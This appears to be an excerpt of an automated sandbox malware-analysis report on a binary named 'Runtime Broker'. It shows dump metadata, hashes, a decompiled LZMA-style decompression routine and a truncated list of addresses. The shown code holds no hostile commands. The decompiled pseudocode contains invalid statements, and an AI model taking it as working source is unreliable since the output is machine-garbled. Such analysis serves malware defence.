%s%S.dll, xrefs: 0040690D
\, xrefs: 004068E9

Memory Dump Source

Source File: 00000000.00000002.920981196.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.920959432.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921010628.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.921033806.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921051834.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921095528.0000000000427000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921117570.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.921134004.000000000043B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Runtime Broker.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction ID: 979e31ef7f6a653eb027d6e7281dab5f214eebcb072a06bc6d9d9cfc9f176359
Opcode Fuzzy Hash: 63130bafcb32548bd4340548baa3f8658423137b3882cd96386db367ad08b740
Instruction Fuzzy Hash: BDF02B71501219A7CB14BB68DD0DF9B376CEB00304F10447EA646F10D0EB7CDA68CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406AAC, Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00406AAC(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004074FE))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}

0x00406abc
0x00406ac3
0x00406ac9
0x00406acf
0x00000000
0x00406ad3
0x00406adf
0x00406adf
0x00406adf
0x00406ae8
0x00000000
0x00000000
0x00406aee
0x00000000
0x00406af5
0x00406af9
0x00000000
0x00000000
0x00406b02
0x00406b05
0x00406b08
0x00406b0a
0x00406b0c
0x00000000
0x00000000
0x00406b12
0x00406b15
0x00406b17
0x00406b18
0x00406b1b
0x00406b1d
0x00406b1e
0x00406b20
0x00406b23
0x00406b28
0x00406b2d
0x00406b36
0x00406b49
0x00406b4c
0x00406b55
0x00406b58
0x00406b80
0x00406b80
0x00406b82
0x00406b90
0x00406b90
0x00406b94
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b84
0x00406b84
0x00406b87
0x00406b87
0x00406b88
0x00406b88
0x00000000
0x00406b84
0x00406b5a
0x00406b5e
0x00406b63
0x00406b63
0x00406b6c
0x00406b72
0x00406b74
0x00406b77
0x00000000
0x00406b7d
0x00406b7d
0x00000000
0x00406b7d
0x00000000
0x00406b9a
0x00406b9a
0x00406b9e
0x0040744a
0x00000000
0x0040744a
0x00406ba7
0x00406bb7
0x00406bba
0x00406bbd
0x00406bbd
0x00406bbd
0x00406bc0
0x00406bc0
0x00406bc4
0x00000000
0x00000000
0x00406bc6
0x00406bc9
0x00406bcc
0x00406bf6
0x00406bfc
0x00406c03
0x00000000
0x00406c03
0x00406bce
0x00406bd2
0x00406bd5
0x00406bda
0x00406bda
0x00406be5
0x00406beb
0x00406bed
0x00406bf0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406c35
0x00406c3b
0x00406c3e
0x00406c4b
0x00406c53
0x00000000
0x00000000
0x00406c0a
0x00406c0a
0x00406c0e
0x00407459
0x00000000
0x00407459
0x00406c1a
0x00406c25
0x00406c25
0x00406c25
0x00406c28
0x00406c2b
0x00406c2e
0x00406c31
0x00406c33
0x00000000
0x00000000
0x00000000
0x00000000
0x004072ca
0x004072ca
0x004072d0
0x004072d6
0x004072d9
0x004072dc
0x004072f6
0x004072f9
0x004072ff
0x0040730a
0x0040730a
0x0040730c
0x004072de
0x004072de
0x004072ed
0x004072f1
0x004072f1
0x0040730f
0x00407316
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00407318
0x00407318
0x0040731c
0x004074cb
0x00000000
0x004074cb
0x00407328
0x0040732f
0x00407337
0x00407337
0x00407337
0x0040733a
0x0040733d
0x0040733d
0x00000000
0x00000000
0x00406c5b
0x00406c5d
0x00406c60
0x00406cd1
0x00406cd4
0x00406cd7
0x00406cde
0x00406ce8
0x00000000
0x00406ce8
0x00406c62
0x00406c66
0x00406c69
0x00406c6b
0x00406c6e
0x00406c71
0x00406c73
0x00406c76
0x00406c78
0x00406c7d
0x00406c80
0x00406c83
0x00406c87
0x00406c8e
0x00406c91
0x00406c98
0x00406c9c
0x00406ca4
0x00406ca4
0x00406ca4
0x00406c9e
0x00406c9e
0x00406c9e
0x00406c93
0x00406c93
0x00406c93
0x00406ca8
0x00406cab
0x00406cc9
0x00406ccb
0x00000000
0x00406ccb
0x00406cad
0x00406cb0
0x00406cb3
0x00406cb6
0x00406cb8
0x00406cb8
0x00406cb8
0x00406cbb
0x00406cbe
0x00406cc0
0x00406cc1
0x00406cc4
0x00000000
0x00000000
0x00406efa
0x00406efe
0x00406f1c
0x00406f1f
0x00406f26
0x00406f29
0x00406f2c
0x00406f2f
0x00406f32
0x00406f35
0x00406f37
0x00406f3e
0x00406f3f
0x00406f41
0x00406f44
0x00406f47
0x00406f4a
0x00406f4a
0x00406f4f
0x00000000
0x00406f4f
0x00406f00
0x00406f03
0x00406f06
0x00406f10
0x00000000
0x00000000
0x00406f64
0x00406f68
0x00406f8b
0x00406f8e
0x00406f91
0x00406f9b
0x00406f6a
0x00406f6a
0x00406f6d
0x00406f70
0x00406f73
0x00406f80
0x00406f83
0x00406f83
0x00000000
0x00000000
0x00406fa7
0x00406fab
0x00000000
0x00000000
0x00406fb1
0x00406fb5
0x00000000
0x00000000
0x00406fbb
0x00406fbd
0x00406fc1
